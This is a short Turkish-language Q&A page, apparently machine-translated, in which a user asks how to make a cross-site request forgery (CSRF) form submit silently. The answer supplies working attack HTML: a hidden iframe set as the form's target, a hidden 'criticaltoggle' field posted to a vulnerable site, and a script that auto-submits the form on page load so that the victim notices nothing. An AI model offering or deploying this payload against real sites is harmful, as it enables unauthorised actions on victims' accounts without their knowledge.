1. ev
  2. Soru-cevap
  3. Sessizce bir POST FORMU (CSRF) gönderen örnek

Sessizce bir POST FORMU (CSRF) gönderen örnek

2013-07-30 21 views
13

Kullanıcı herhangi bir bildirimde bulunmadan CSRF için bir POST formu sessizce nasıl gönderilebileceğini bilmekle ilgilenir (POSTED URL'ye yönlendirilen belge konumu değil sessiz).Sessizce bir POST FORMU (CSRF) gönderen örnek

Örnek: otomatik ve sessizce bu formu tetiklemek için yapmanız gereken ne harici sitesinde

<form method='POST' action='http://vulnerablesite.com/form.php'> 
<input type='hidden' name='criticaltoggle' value='true' 
<input type='submit' value='submit'> 
</form>

?

kaynak

2013-07-30 apscience

cevap

32

bir çözelti, bir iframe gibi bir çerçeve içinde formun işlem açık olacaktır:

<iframe style="display:none" name="csrf-frame"></iframe> 
<form method='POST' action='http://vulnerablesite.com/form.php' target="csrf-frame" id="csrf-form"> 
    <input type='hidden' name='criticaltoggle' value='true'> 
    <input type='submit' value='submit'> 
</form> 
<script>document.getElementById("csrf-form").submit()</script>

kaynak

2013-07-30 17:41:00 Gumbo

İlgili konular

 İlgili konular